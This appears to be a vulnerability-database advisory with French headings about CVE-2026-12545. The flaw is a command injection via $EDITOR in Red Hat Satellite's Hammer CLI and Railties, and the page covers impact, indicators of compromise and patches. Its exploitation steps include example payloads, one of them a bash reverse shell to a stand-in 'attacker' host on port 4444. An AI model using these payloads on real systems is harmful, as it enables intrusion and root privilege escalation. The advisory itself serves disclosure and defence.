CVE-2026-12545: 
Ruby Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-12545 is a command injection vulnerability in rubygem-hammer_cli (Hammer CLI) and the Railties (Ruby on Rails) component distributed with Red Hat Satellite. The flaw arises from insecure interpolation of the $EDITOR environment variable into Ruby's system() method, allowing shell metacharacters (e.g., ;, |, &) to be interpreted by /bin/sh. It was reported on June 17, 2026, and patches were published on October 1, 2026. Affected products include rubygem-hammer_cli versions prior to 3.12.0-2.el8sat, 3.12.0-2.el9sat, 3.14.0-2.el9sat, 3.16.0-2.el9sat, and 3.18.0-2.el9sat, as shipped with Red Hat Satellite 6.16–6.19. It carries a CVSS v3.1 base score of 6.7 (Medium/High) (Red Hat CVE, GitHub Advisory).

Détails techniques

The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command). In lib/hammer_cli/utils.rb, the open_in_editor method executes system("#{ENV['EDITOR'] || 'vi'} #{f.path}"), passing a single interpolated string to system(), which causes Ruby to invoke /bin/sh -c and interpret any shell metacharacters embedded in the $EDITOR value. The same pattern exists in railties-7.0.10/lib/rails/commands/encrypted/encrypted_command.rb and secrets_command.rb. Exploitation requires local access, low privileges, and user interaction (e.g., triggering an editor invocation), making the attack complexity high. The Railties version in use (7.0.10) is End-of-Life and will not receive upstream patches, requiring manual remediation (Red Hat Bugzilla, Red Hat CVE).

Impact

Successful exploitation allows a local attacker with low privileges to execute arbitrary OS commands within the Hammer CLI process's effective security context, resulting in high confidentiality, integrity, and availability impact. If Hammer CLI is invoked with elevated permissions (e.g., via sudo with environment preservation), exploitation can lead to full root-level privilege escalation. Malicious activities executed through this vector may appear to originate from the application itself, complicating forensic attribution (Red Hat CVE, Red Hat Bugzilla).

Exploitabilité

There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the disclosure date (Red Hat CVE). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The EPSS score is approximately 0.505%, indicating a low probability of exploitation in the near term. The attack is not automatable (per NVD SSVC assessment) due to the requirement for local access and user interaction (GitHub Advisory).

Étapes d’exploitation

  1. Gain local access: Obtain a low-privilege local account on a system running Hammer CLI (e.g., a Red Hat Satellite server or a host with rubygem-hammer_cli installed).
  2. Identify an editor-triggering command: Determine which Hammer CLI commands invoke the open_in_editor method (e.g., commands that open a file for interactive editing).
  3. Craft a malicious $EDITOR value: Set the $EDITOR environment variable to a payload containing shell metacharacters, such as EDITOR='vi; id > /tmp/pwned' or EDITOR='vi | /bin/bash -i >& /dev/tcp/attacker/4444 0>&1'.
  4. Trigger the vulnerable code path: Execute the Hammer CLI command that calls open_in_editor, causing system("#{ENV['EDITOR'] || 'vi'} #{f.path}") to be evaluated with the malicious $EDITOR value.
  5. Achieve arbitrary command execution: The shell interprets the metacharacters, executing the injected command with the privileges of the Hammer CLI process. If run under sudo -E, this results in root-level command execution (Red Hat Bugzilla, Red Hat CVE).

Indicateurs de compromis

  • Process: Unexpected child processes spawned by the Hammer CLI Ruby process (e.g., /bin/sh, /bin/bash, curl, wget, nc) with unusual arguments or network connections.
  • File System: Unexpected files created in world-writable directories (e.g., /tmp/) by the Hammer CLI process; new cron jobs or SSH authorized keys added by the Satellite service account.
  • Logs: Shell history or audit logs (/var/log/audit/audit.log) showing system() calls with unusual $EDITOR values containing metacharacters (;, |, &); auditd records of unexpected execve syscalls from the Hammer CLI process.
  • Environment: Presence of a non-standard $EDITOR environment variable containing shell metacharacters in process environment listings (/proc/<pid>/environ).

Atténuation et solutions de contournement

Red Hat has released patched versions of rubygem-hammer_cli across multiple Satellite releases: 3.12.0-2.el8sat / 3.12.0-2.el9sat (Satellite 6.16), 3.14.0-2.el9sat (Satellite 6.17), 3.16.0-2.el9sat (Satellite 6.18), and 3.18.0-2.el9sat (Satellite 6.19), delivered via RHSA-2026:74503, RHSA-2026:74504, RHSA-2026:74505, and RHSA-2026:74506. Red Hat notes that no configuration-based mitigation meeting their deployment criteria is available; upgrading to a patched package is the recommended remediation. As a defensive measure, administrators should restrict or sanitize the $EDITOR environment variable, avoid running Hammer CLI with sudo -E, and consider replacing system() string interpolation with array-based argument passing in custom scripts (Red Hat Errata RHSA-2026:74503, Red Hat Errata RHSA-2026:74504, Red Hat CVE).

Réactions de la communauté

The vulnerability was discovered internally by Laura Pardo and Toni Gornals of Red Hat, and was disclosed as part of a broader Satellite security update addressing multiple command injection and privilege escalation issues. No notable external researcher commentary or significant social media discussion has been identified beyond standard CVE tracking and aggregator coverage (Red Hat CVE).

Ressources additionnelles

État de correction de la distribution Linux

Disponibilité des correctifs sur les principales distributions Linux et leurs versions.

RHEL / CentOS

Inconnu

Source: Ce rapport a été généré à l’aide de l’IA

Apparenté Ruby Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-55107CRITICAL10
  • Ruby logoRuby
  • kobako
NonOuiSep 30, 2026
CVE-2026-77602CRITICAL9.9
  • Ruby logoRuby
  • openc3
NonOuiSep 23, 2026
CVE-2026-84782HIGH8.2
  • Ruby logoRuby
  • shim-unsigned-x64.src
NonOuiSep 29, 2026
CVE-2026-12545MEDIUM6.7
  • Ruby logoRuby
  • hammer_cli
NonOuiOct 01, 2026
GHSA-mwm8-39rw-8826MEDIUM6.3
  • Ruby logoRuby
  • sqlite3
NonOuiOct 02, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités